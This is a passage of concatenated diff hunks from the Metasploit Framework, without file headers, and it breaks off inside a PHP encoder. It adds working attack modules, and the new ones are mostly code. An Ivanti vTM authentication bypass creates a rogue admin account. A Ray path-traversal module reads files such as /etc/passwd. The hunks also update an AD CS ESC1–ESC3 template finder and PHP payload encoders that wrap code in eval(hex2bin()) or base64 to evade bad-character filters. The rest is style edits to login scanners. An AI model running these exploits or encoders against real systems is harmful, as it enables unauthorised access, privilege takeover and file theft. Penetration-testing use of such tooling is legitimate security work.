+        'DisclosureDate' => '2024-08-05',
+        'DefaultOptions' => {
+          'RPORT' => 9090,
+          'SSL' => 'True'
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub(/[^a-zA-Z0-9_-]/, '_')]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'apps', 'zxtm', 'login.cgi')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+
+    body = res.body
+    version_regex = /StingrayVersion\.Set\(\s*'([^']+)'\s*,/
+    match = body.match(version_regex)
+    if match
+      version = match[1]
+      return Exploit::CheckCode::Appears("Version: #{version}") if Rex::Version.new(version) <= Rex::Version.new('22.7R1')
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers'),
+      'vars_post' => {
+        '_form_submitted' => 'form',
+        'create_user' => 'Create',
+        'group' => 'admin',
+        'newusername' => datastore['NEW_USERNAME'],
+        'password1' => datastore['NEW_PASSWORD'],
+        'password2' => datastore['NEW_PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    title_tag = html.at_css('title')
+
+    fail_with(Failure::UnexpectedReply, 'title tag not found.') unless title_tag
+    title_text = title_tag.text.strip
+    if title_text == '2'
+      print_status('Request to add new admin user sent, verifying...')
+
+      form = Rex::MIME::Message.new
+      form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
+      form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
+      form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
+      form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
+
+      res = send_request_cgi(
+        {
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
+          'ctype' => "multipart/form-data; boundary=#{form.bound}",
+          'data' => form.to_s
+        }
+      )
+      if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_')
+        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+        print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+        print_good("Login at: #{full_uri(normalize_uri(target_uri, 'apps/zxtm/login.cgi'))}")
+      end
+
+    elsif title_text == '0' && html.to_s.include?('ERROR: Specified user already exists')
+      fail_with(Failure::BadConfig, "Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.")
+    elsif title_text == '0' && html.to_s.include?('ERROR: Username must contain only: letters, numbers,')
+      fail_with(Failure::BadConfig, "Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.")
+    else
+      fail_with(Failure::NotVulnerable, 'Unexpected string found inside the title tag: ' + title_text)
+    end
+  end
+end
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
-          'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
+          'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ] # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
        },
        'DisclosureDate' => '2021-09-06',
        'DefaultTarget' => 0
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Auxiliary
          # resetting the router to the default factory password.
          'Stability' => [ CRASH_SERVICE_DOWN ], # This module will crash the target service after it is run.
          'Reliability' => [],
-          'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
+          'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ] # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
        },
        'DisclosureDate' => '2020-06-15',
        'DefaultTarget' => 0
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
  def run
    connect
    res = sock.get_once
-    if (res && res =~ /220 Session will be terminated after/)
+    if res && res =~ /220 Session will be terminated after/
      print_status('Target appears to be a Cisco VPN Concentrator 3000 series.')

      test = Rex::Text.rand_text_alphanumeric(8)
@@ -117,7 +117,6 @@ class MetasploitModule < Msf::Auxiliary

      wsock.put_wstext(create_injection_request(payload))
      recv_wsframe_status(wsock) == 0
-
    rescue Rex::Proto::Http::WebSocket::ConnectionError => e
      res = e.http_response
      fail_with(Failure::Unreachable, e.message) if res.nil?
@@ -129,12 +129,12 @@ class MetasploitModule < Msf::Auxiliary

      case request.uri
      when /^\/found\/\?f=/
-        f = URI.unescape(request.uri.gsub('/found/?f=', ''))
+        f = URI.decode_www_form(request.uri.split("/found/?").last).assoc('f').last
        report_note(host: cli.peerhost, type: 'ie.filenames', data: f)
        print_good("Found file " + f)
        send_response(cli, '')
      when /^\/notfound\/\?f=/
-        f = URI.unescape(request.uri.gsub('/notfound/?f=', ''))
+        f = URI.decode_www_form(request.uri.split("/notfound/?").last).assoc('f').last
        print_error("The file " + f + " does not exist")
        send_response(cli, '')
      when "/"
@@ -2,6 +2,7 @@ class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::LDAP
  include Msf::OptionalSession::LDAP
+  include Rex::Proto::Secauthz

  ADS_GROUP_TYPE_BUILTIN_LOCAL_GROUP = 0x00000001
  ADS_GROUP_TYPE_GLOBAL_GROUP = 0x00000002
@@ -9,6 +10,16 @@ class MetasploitModule < Msf::Auxiliary
  ADS_GROUP_TYPE_SECURITY_ENABLED = 0x80000000
  ADS_GROUP_TYPE_UNIVERSAL_GROUP = 0x00000008

+  SID = Struct.new(:value, :name) do
+    def to_s
+      name.present? ? "#{value} (#{name})" : value
+    end
+
+    def rid
+      value.split('-').last.to_i
+    end
+  end
+
  def initialize(info = {})
    super(
      update_info(
@@ -53,7 +64,8 @@ class MetasploitModule < Msf::Auxiliary

    register_options([
      OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),
-      OptBool.new('REPORT_NONENROLLABLE', [true, 'Report nonenrollable certificate templates', false])
+      OptBool.new('REPORT_NONENROLLABLE', [true, 'Report nonenrollable certificate templates', false]),
+      OptBool.new('REPORT_PRIVENROLLABLE', [true, 'Report certificate templates restricted to domain and enterprise admins', false]),
    ])
  end

@@ -144,8 +156,8 @@ class MetasploitModule < Msf::Auxiliary
    returned_entries
  end

-  def query_ldap_server_certificates(esc_raw_filter, esc_name)
-    attributes = ['cn', 'description', 'ntSecurityDescriptor']
+  def query_ldap_server_certificates(esc_raw_filter, esc_name, notes: [])
+    attributes = ['cn', 'description', 'ntSecurityDescriptor', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', 'PkiExtendedKeyUsage']
    base_prefix = 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
    esc_entries = query_ldap_server(esc_raw_filter, attributes, base_prefix: base_prefix)

@@ -165,12 +177,22 @@ class MetasploitModule < Msf::Auxiliary

      allowed_sids = parse_acl(security_descriptor.dacl) if security_descriptor.dacl
      next if allowed_sids.empty?
+      next if allowed_sids.empty?

      certificate_symbol = entry[:cn][0].to_sym
      if @vuln_certificate_details.key?(certificate_symbol)
        @vuln_certificate_details[certificate_symbol][:vulns] << esc_name
+        @vuln_certificate_details[certificate_symbol][:notes] += notes
      else
-        @vuln_certificate_details[certificate_symbol] = { vulns: [esc_name], dn: entry[:dn][0], certificate_enrollment_sids: convert_sids_to_human_readable_name(allowed_sids), ca_servers_n_enrollment_sids: {}, notes: [] }
+        @vuln_certificate_details[certificate_symbol] = {
+          vulns: [esc_name],
+          dn: entry[:dn][0],
+          certificate_enrollment_sids: convert_sids_to_human_readable_name(allowed_sids),
+          ca_servers_n_enrollment_sids: {},
+          manager_approval: ([entry[%s(mspki-enrollment-flag)].first.to_i].pack('l').unpack1('L') & Rex::Proto::MsCrtd::CT_FLAG_PEND_ALL_REQUESTS) != 0,
+          required_signatures: [entry[%s(mspki-ra-signature)].first.to_i].pack('l').unpack1('L'),
+          notes: notes
+        }
      end
    end
  end
@@ -193,16 +215,12 @@ class MetasploitModule < Msf::Auxiliary
      end
    end

-    result = []
+    results = []
    output.each do |sid_string, sid_name, sam_account_name|
-      if sam_account_name
-        result << "#{sid_string} (#{sam_account_name})"
-      else
-        result << "#{sid_string} (#{sid_name})"
-      end
+      results << SID.new(sid_string, sam_account_name || sid_name)
    end

-    result.join(' | ')
+    results
  end

  def find_esc1_vuln_cert_templates
@@ -219,7 +237,10 @@ class MetasploitModule < Msf::Auxiliary
      ')'\
      '(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)'\
    ')'
-    query_ldap_server_certificates(esc1_raw_filter, 'ESC1')
+    notes = [
+      'ESC1: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag)'
+    ]
+    query_ldap_server_certificates(esc1_raw_filter, 'ESC1', notes: notes)
  end

  def find_esc2_vuln_cert_templates
@@ -232,8 +253,10 @@ class MetasploitModule < Msf::Auxiliary
        '(!(pkiextendedkeyusage=*))'\
      ')'\
    ')'
-
-    query_ldap_server_certificates(esc2_raw_filter, 'ESC2')
+    notes = [
+      'ESC2: Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage)'
+    ]
+    query_ldap_server_certificates(esc2_raw_filter, 'ESC2', notes: notes)
  end

  def find_esc3_vuln_cert_templates
@@ -249,7 +272,10 @@ class MetasploitModule < Msf::Auxiliary
      ')'\
      '(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.1)'\
    ')'
-    query_ldap_server_certificates(esc3_template_1_raw_filter, 'ESC3_TEMPLATE_1')
+    notes = [
+      'ESC3: Template defines the Certificate Request Agent OID (PkiExtendedKeyUsage)'
+    ]
+    query_ldap_server_certificates(esc3_template_1_raw_filter, 'ESC3_TEMPLATE_1', notes: notes)

    # Find the second vulnerable types of ESC3 templates, those that
    # have the right template schema version and, for those with a template
@@ -369,50 +395,81 @@ class MetasploitModule < Msf::Auxiliary
  end

  def print_vulnerable_cert_info
-    @vuln_certificate_details.each do |key, hash|
-      enrollable = true
-      if hash[:ca_servers_n_enrollment_sids].blank?
-        next unless datastore['REPORT_NONENROLLABLE']
-
-        enrollable = false
+    vuln_certificate_details = @vuln_certificate_details.select do |_key, hash|
+      select = true
+      select = false unless datastore['REPORT_PRIVENROLLABLE'] || hash[:certificate_enrollment_sids].any? do |sid|
+        # compare based on RIDs to avoid issues language specific issues
+        !(sid.value.starts_with?("#{WellKnownSids::SECURITY_NT_NON_UNIQUE}-") && [
+          # RID checks
+          WellKnownSids::DOMAIN_GROUP_RID_ADMINS,
+          WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_ADMINS,
+          WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_READONLY_DOMAIN_CONTROLLERS,
+          WellKnownSids::DOMAIN_GROUP_RID_CONTROLLERS,
+          WellKnownSids::DOMAIN_GROUP_RID_SCHEMA_ADMINS
+        ].include?(sid.rid)) && ![
+          # SID checks
+          WellKnownSids::SECURITY_ENTERPRISE_CONTROLLERS_SID
+        ].include?(sid.value)
      end

-      print_status("Template: #{key}")
-      unless enrollable
-        print_warning("   #{key} not published as an enrollable certificate!")
-      end
+      select = false unless datastore['REPORT_NONENROLLABLE'] || hash[:ca_servers_n_enrollment_sids].any?
+      select
+    end

-      print_status("   Distinguished Name: #{hash[:dn]}")
-      print_status("   Vulnerable to: #{hash[:vulns].join(', ')}")
+    any_esc3t1 = vuln_certificate_details.values.any? do |hash|
+      hash[:vulns].include?('ESC3_TEMPLATE_1') && (datastore['REPORT_NONENROLLABLE'] || hash[:ca_servers_n_enrollment_sids].any?)
+    end
+
+    vuln_certificate_details.each do |key, hash|
+      vulns = hash[:vulns]
+      vulns.delete('ESC3_TEMPLATE_2') unless any_esc3t1 # don't report ESC3_TEMPLATE_2 if there are no instances of ESC3_TEMPLATE_1
+      next if vulns.empty?
+
+      print_good("Template: #{key}")
+
+      print_status("  Distinguished Name: #{hash[:dn]}")
+      print_status("  Manager Approval: #{hash[:manager_approval] ? '%redRequired' : '%grnDisabled'}%clr")
+      print_status("  Required Signatures: #{hash[:required_signatures] == 0 ? '%grn0' : '%red' + hash[:required_signatures].to_s}%clr")
+      print_good("  Vulnerable to: #{vulns.join(', ')}")
      if hash[:notes].present? && hash[:notes].length == 1
-        print_status("   Notes: #{hash[:notes].first}")
+        print_status("  Notes: #{hash[:notes].first}")
      elsif hash[:notes].present? && hash[:notes].length > 1
-        print_status('   Notes:')
+        print_status('  Notes:')
        hash[:notes].each do |note|
-          print_status("     * #{note}")
+          print_status("    * #{note}")
        end
      end

-      print_status('   Certificate Template Enrollment SIDs:')
-      for sid in hash[:certificate_enrollment_sids].split(' | ')
-        print_status("      * #{sid}")
+      print_status('  Certificate Template Enrollment SIDs:')
+      hash[:certificate_enrollment_sids].each do |sid|
+        print_status("    * #{highlight_sid(sid)}")
      end

-      next unless enrollable
-
-      for ca_hostname, ca_hash in hash[:ca_servers_n_enrollment_sids]
-        print_status('   Issuing CAs:')
-        print_status("      * #{ca_hash[:cn]}")
-        print_status("         Server: #{ca_hostname}")
-        print_status('         Enrollment SIDs:')
-        sid_list_string = convert_sids_to_human_readable_name(ca_hash[:ca_enrollment_sids])
-        for sid_info in sid_list_string.split(' | ')
-          print_status("            * #{sid_info}")
+      if hash[:ca_servers_n_enrollment_sids].any?
+        hash[:ca_servers_n_enrollment_sids].each do |ca_hostname, ca_hash|
+          print_good("  Issuing CA: #{ca_hash[:cn]} (#{ca_hostname})")
+          print_status('    Enrollment SIDs:')
+          convert_sids_to_human_readable_name(ca_hash[:ca_enrollment_sids]).each do |sid|
+            print_status("      * #{highlight_sid(sid)}")
+          end
        end
+      else
+        print_warning('   Issuing CAs: none (not published as an enrollable certificate)')
      end
    end
  end

+  def highlight_sid(sid)
+    color = ''
+    color = '%grn' if sid.value == WellKnownSids::SECURITY_AUTHENTICATED_USER_SID
+    if sid.value.starts_with?("#{WellKnownSids::SECURITY_NT_NON_UNIQUE}-")
+      color = '%grn' if sid.rid == WellKnownSids::DOMAIN_GROUP_RID_USERS
+      color = '%grn' if sid.rid == WellKnownSids::DOMAIN_GROUP_RID_GUESTS
+      color = '%grn' if sid.rid == WellKnownSids::DOMAIN_GROUP_RID_COMPUTERS
+    end
+    "#{color}#{sid.value} (#{sid.name})%clr"
+  end
+
  def get_pki_object_by_oid(oid)
    pki_object = @ldap_mspki_enterprise_oids.find { |o| o['mspki-cert-template-oid'].first == oid }

@@ -154,19 +154,16 @@ class MetasploitModule < Msf::Auxiliary
      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
    end

-    if datastore['SSL']
-      ssl_restore = true
-      datastore['SSL'] = false
-    end
    start_service({
      'Uri' => {
        'Proc' => proc do |cli, req|
          on_request_uri(cli, req)
        end,
        'Path' => '/'
-      }
+      },
+      'ssl' => false
    })
-    datastore['SSL'] = true if ssl_restore
+
    xxe_request
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
@@ -57,11 +57,10 @@ class MetasploitModule < Msf::Auxiliary

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200
-    fail_with(Failure::UnexpectedReply, "#{peer} - Prometheus Node Exporter not found") unless (
+    fail_with(Failure::UnexpectedReply, "#{peer} - Prometheus Node Exporter not found") unless
      res.body.include?('<h2>Prometheus Node Exporter</h2>') ||
      res.body.include?('<title>Node Exporter</title>') || # version 0.15.2
      res.body.include?('<h2>Prometheus Exporter for Windows servers</h2>')
-    )

    vprint_good("#{peer} - Prometheus Node Exporter version: #{Regexp.last_match(1)}") if res.body =~ /version=([\d.]+)/

@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ray static arbitrary file read',
+        'Description' => %q{
+          Ray before 2.8.1 is vulnerable to a local file inclusion.
+        },
+        'Author' => [
+          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module
+          'danmcinerney <dan@protectai.com>',     # Python Metasploit module
+          'Takahiro Yokoyama'                     # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-6020'],
+          ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
+          ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
+        ],
+        'DisclosureDate' => '2023-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ IOC_IN_LOGS, ],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8265),
+        OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/version')
+    })
+    return Exploit::CheckCode::Unknown unless res && res.code == 200
+
+    ray_version = res.get_json_document['ray_version']
+
+    return Exploit::CheckCode::Unknown unless ray_version
+
+    return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')
+
+    file_content = lfi('/etc/passwd')
+    return Exploit::CheckCode::Vulnerable unless file_content.nil?
+
+    Exploit::CheckCode::Appears
+  end
+
+  def lfi(filepath)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")
+    })
+    return unless res && res.code == 200
+
+    res.body
+  end
+
+  def run
+    file_content = lfi(datastore['FILEPATH'])
+    fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content
+    print_good("#{datastore['FILEPATH']}\n#{file_content}")
+  end
+
+end
@@ -18,11 +18,11 @@ class MetasploitModule < Msf::Auxiliary
      'Author' => 'Btnz',
      'License' => MSF_LICENSE,
      'Disclosure Date' => '2020-10-01',
-      'Notes'               => {
-        'Stability'         => [],
-        'SideEffects'       => [],
-        'Reliability'       => [],
-        'RelatedModules' => ['auxiliary/scanner/http/emby_version_ssrf'],
+      'Notes' => {
+        'Stability' => [],
+        'SideEffects' => [],
+        'Reliability' => [],
+        'RelatedModules' => ['auxiliary/scanner/http/emby_version_ssrf']
      },
      'References' => [
        ['CVE', '2020-26948'],
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary

    version_raw = res.body[/fml-admin-login-(\d+).js/, 1]
    version = version_raw.to_i
-    unless (res.body.include?('newpassword') && (version.between?(140, 160) || version.between?(730, 745) || version.between?(250, 263)))
+    unless res.body.include?('newpassword') && (version.between?(140, 160) || version.between?(730, 745) || version.between?(250, 263))
      print_bad("#{ip} - Not vulnerable version (Build: #{version_raw}) of FortiMail detected")
      return :abort
    end
@@ -14,23 +14,21 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'        => 'GitLab Login Utility',
+      'Name' => 'GitLab Login Utility',
      'Description' => 'This module attempts to login to a GitLab instance using a specific user/pass.',
-      'Author'      => [ 'Ben Campbell' ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['URL', 'https://labs.f-secure.com/archive/gitlab-user-enumeration/']
-        ]
+      'Author' => [ 'Ben Campbell' ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'https://labs.f-secure.com/archive/gitlab-user-enumeration/']
+      ]
    )

    register_options(
      [
        Opt::RPORT(80),
-        OptString.new('HttpUsername', [ true, 'The username to test', 'root' ]),
-        OptString.new('HttpPassword', [ true, 'The password to test', '5iveL!fe' ]),
        OptString.new('TARGETURI', [true, 'The path to GitLab', '/'])
-      ])
+      ]
+    )

    register_autofilter_ports([ 80, 443 ])
  end
@@ -38,23 +36,23 @@ class MetasploitModule < Msf::Auxiliary
  def run_host(ip)
    uri = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')
    res = send_request_cgi(
-                            'method' => 'GET',
-                            'cookie' => 'request_method=GET',
-                            'uri'    => uri
+      'method' => 'GET',
+      'cookie' => 'request_method=GET',
+      'uri' => uri
    )

    if res && res.body && res.body.include?('user[email]')
-      vprint_status("GitLab v5 login page")
+      vprint_status('GitLab v5 login page')
    elsif res && res.body && res.body.include?('user[login]')
-      vprint_status("GitLab v7 login page")
+      vprint_status('GitLab v7 login page')
    else
      vprint_error('Not a valid GitLab login page')
      return
    end

    cred_collection = build_credential_collection(
-      username: datastore['HttpUsername'],
-      password: datastore['HttpPassword']
+      username: datastore['USERNAME'],
+      password: datastore['PASSWORD']
    )

    scanner = Metasploit::Framework::LoginScanner::GitLab.new(
@@ -70,8 +68,8 @@ class MetasploitModule < Msf::Auxiliary
    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
-          module_fullname: fullname,
-          workspace_id: myworkspace_id
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
      )
      if result.success?
        credential_core = create_credential(credential_data)
@@ -11,7 +11,6 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
-  include Msf::Exploit::Remote::HTTP::Jenkins

  def initialize
    super(
@@ -32,16 +31,16 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run_host(ip)
-    print_warning("#{self.fullname} is still calling the deprecated LOGIN_URL option! This is no longer supported.") unless datastore['LOGIN_URL'].nil?
+    print_warning("#{fullname} is still calling the deprecated LOGIN_URL option! This is no longer supported.") unless datastore['LOGIN_URL'].nil?
    cred_collection = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

-    login_uri = jenkins_uri_check(target_uri)
    scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
      configure_http_login_scanner(
-        uri: normalize_uri(login_uri),
+        uri: datastore['TARGETURI'],
+        ssl: datastore['SSL'],
        method: datastore['HTTP_METHOD'],
        cred_details: cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
@@ -52,12 +51,17 @@ class MetasploitModule < Msf::Auxiliary
      )
    )

+    message = scanner.check_setup
+
+    if message
+      print_brute level: :error, ip: ip, msg: message
+      return
+    end
+
    scanner.scan! do |result|
      credential_data = result.to_h
-      credential_data.merge!(
-          module_fullname: fullname,
-          workspace_id: myworkspace_id
-      )
+      credential_data.merge!(module_fullname: fullname, workspace_id: myworkspace_id)
+
      if result.success?
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
@@ -44,9 +44,9 @@ class MetasploitModule < Msf::Auxiliary
  def run_host(ip)
    case datastore['METHOD']
    when 'POST'
-      parsed_data = queryparse(URI.unescape(datastore['DATA']))
+      parsed_data = queryparse(URI.decode_www_form_component(datastore['DATA']))
    when 'GET'
-      parsed_data = queryparse(URI.unescape(datastore['QUERY']))
+      parsed_data = queryparse(URI.decode_www_form_component(datastore['QUERY']))
    end
    data_base_params = get_base_params(parsed_data)

@@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary
          url_enc = line.sub(/^PREFIX=/, '')
          # Remove CASE and VHOST
          url_enc = url_enc.sub(/&CASE=.*/, '')
-          url_dec = URI.unescape(url_enc).sub(/;/, '')
+          url_dec = CGI.unescape(url_enc).sub(/;/, '')
          urls << url_dec.strip
        end
      end
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Auxiliary
    loop do
      data, host, port = lsocket.recvfrom(65535, datastore['TIMEOUT'])
      data2, host2, port2 = ssocket.recvfrom(65535, datastore['TIMEOUT'])
-      break if (host.nil? && host2.nil?)
+      break if host.nil? && host2.nil?

      cap << [data, host, port] if host
      cap << [data2, host2, port2] if host2
@@ -17,6 +17,11 @@ class MetasploitModule < Msf::Encoder
      'Author' => 'egypt',
      'License' => BSD_LICENSE,
      'Arch' => ARCH_PHP)
+    register_options(
+      [
+        OptBool.new('Compress', [ true, 'Compress the payload with zlib', false ]) # Disabled by default as it relies on having php compiled with zlib, which might not be available on come exotic setups.
+      ],
+      self.class)
  end

  def encode_block(state, buf)
@@ -26,6 +31,12 @@ class MetasploitModule < Msf::Encoder
      raise BadcharError if state.badchars.include?(c)
    end

+    if datastore['Compress']
+      %w[g z u n c o m p r e s s].uniq.each do |c|
+        raise BadcharError if state.badchars.include?(c)
+      end
+    end
+
    # Modern versions of PHP choke on unquoted literal strings.
    quote = "'"
    if state.badchars.include?("'")
@@ -34,6 +45,10 @@ class MetasploitModule < Msf::Encoder
      quote = '"'
    end

+    if datastore['Compress']
+      buf = Zlib::Deflate.deflate(buf)
+    end
+
    # PHP escapes quotes by default with magic_quotes_gpc, so we use some
    # tricks to get around using them.
    #
@@ -56,10 +71,6 @@ class MetasploitModule < Msf::Encoder
    # raw string, so strip it off.
    b64.gsub!(/[=\n]+/, '')

-    # The first character must not be a non-alpha character or PHP chokes.
-    i = 0
-    b64[i] = "chr(#{b64[i]})." while (b64[i].chr =~ %r{[0-9/+]})
-
    # Similarly, when we separate large payloads into chunks to avoid the
    # 998-byte problem mentioned above, we have to make sure that the first
    # character of each chunk is an alpha character.  This simple algorithm
@@ -76,15 +87,15 @@ class MetasploitModule < Msf::Encoder
    # Plus characters ('+') in a uri are converted to spaces, so replace
    # them with something that PHP will turn into a plus.  Slashes cause
    # parse errors on the server side, so do the same for them.
-    b64.gsub!('+', '.chr(43).')
-    b64.gsub!('/', '.chr(47).')
+    b64.gsub!('+', "#{quote}.chr(43).#{quote}")
+    b64.gsub!('/', "#{quote}.chr(47).#{quote}")

    state.badchars.each_byte do |byte|
      # Last ditch effort, if any of the normal characters used by base64
      # are badchars, try to replace them with something that will become
      # the appropriate thing on the other side.
      if b64.include?(byte.chr)
-        b64.gsub!(byte.chr, ".chr(#{byte}).")
+        b64.gsub!(byte.chr, "#{quote}.chr(#{byte}).#{quote}")
      end
    end

@@ -98,6 +109,10 @@ class MetasploitModule < Msf::Encoder
    # cause a syntax error.  Remove any trailing dots.
    b64.chomp!('.')

-    return 'eval(base64_decode(' + quote + b64 + quote + '));'
+    if datastore['Compress']
+      return 'eval(gzuncompress(base64_decode(' + quote + b64 + quote + ')));'
+    else
+      return 'eval(base64_decode(' + quote + b64 + quote + '));'
+    end
  end
 end
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+  Rank = GreatRanking
+
+  def initialize
+    super(
+      'Name' => 'PHP Hex Encoder',
+      'Description' => %q{
+        This encoder returns a hex string encapsulated in
+        eval(hex2bin()), increasing the size by a bit more than
+        a factor two.
+      },
+      'Author' => 'Julien Voisin',
+      'License' => BSD_LICENSE,
+      'Arch' => ARCH_PHP)
+    register_options(
+      [
+        OptBool.new('Compress', [ true, 'Compress the payload with zlib', false ]) # Disabled by default as it relies on having php compiled with zlib, which might not be available on come exotic setups.
+      ],
+      self.class
+    )
+  end
+
+  def encode_block(state, buf)
+    # Have to have these for the decoder stub, so if they're not available,
+    # there's nothing we can do here.
+    %w[e v a l h e x 2 b i n ( ) ;].uniq.each do |c|
+      raise BadcharError if state.badchars.include?(c)
+    end
+
+    if datastore['Compress']
+      %w[g z u n c o m p r e s s].uniq.each do |c|
+        raise BadcharError if state.badchars.include?(c)
+      end
+    end
+
+    # Modern versions of PHP choke on unquoted literal strings.
+    quote = "'"
+    if state.badchars.include?("'")
+      raise BadcharError.new, "The #{name} encoder failed to encode the decoder stub without bad characters." if state.badchars.include?('"')
+
+      quote = '"'
+    end
+
+    if datastore['Compress']
+      buf = Zlib::Deflate.deflate(buf)
+    end
+
+    hex = buf.unpack1('H*')
+
+    state.badchars.each_byte do |byte|
+      # Last ditch effort, if any of the normal characters used by hex
+      # are badchars, try to replace them with something that will become
+      # the appropriate thing on the other side.
+      next unless hex.include?(byte.chr)
+
+      %w[c h r ( ) .].uniq.each do |c|
+        raise BadcharError if state.badchars.include?(c)
+      end
+      hex.gsub!(byte.chr, "#{quote}.chr(#{byte}).#{quote}")
+    end
+
+    if datastore['Compress']
+      return 'eval(gzuncompress(hex2bin(' + quote + hex + quote + ')));'
+    else
+      return 'eval(hex2bin(' + quote + hex + quote + '));'
+    end
+  end
+end
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+  Rank = GreatRanking
+
+  def initialize
+    super(
+      'Name' => 'PHP Minify Encoder',
